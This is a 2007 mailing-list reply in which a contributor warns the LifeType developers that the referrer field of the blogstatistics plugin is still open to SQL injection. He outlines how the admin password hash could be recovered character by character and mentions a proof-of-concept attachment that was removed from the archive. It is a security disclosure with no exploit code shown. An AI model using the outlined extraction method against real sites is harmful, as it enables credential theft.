[pLog-svn] r4930 - plugins/branches/lifetype-1.2/unported/blogstatistics

Matt Wood matt at woodzy.com
Fri Mar 2 23:03:06 EST 2007


You almost got it... referrer is still vulnerable to sql injection... I can
effectively recover the entire database with enough time and some
trickiness... or I could just get your hashed password rather quickly...
10sec per char of md5... so ~5min

This probably gives way to other vulns relying on URL validation class if
the data is being inserted into the db.

Check the attached for a semi PoC. It would take more effort to develop a
real PoC... and I'd have to install the plugin :), although it could be fun
exercise in some python coding.

-Matt

On 3/2/07, Jon Daley <plogworld at jon.limedaley.com> wrote:
>
>         Yes, it is.  And actually it is appropriately labelled. I fixed it
> up some - not sure if I completed all validation.
>
> On Fri, 2 Mar 2007, Matt Wood wrote:
> > InjectSQL eh? Thats a scary function name, threw off my gmail labeling
> > scheme ;)
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://limedaley.com/mailman/listinfo/plog-svn
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://limedaley.com/pipermail/plog-svn/attachments/20070302/6d7f3581/attachment.htm 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: tmp.php
Type: application/x-php
Size: 1334 bytes
Desc: not available
Url : http://limedaley.com/pipermail/plog-svn/attachments/20070302/6d7f3581/attachment.bin 


More information about the pLog-svn mailing list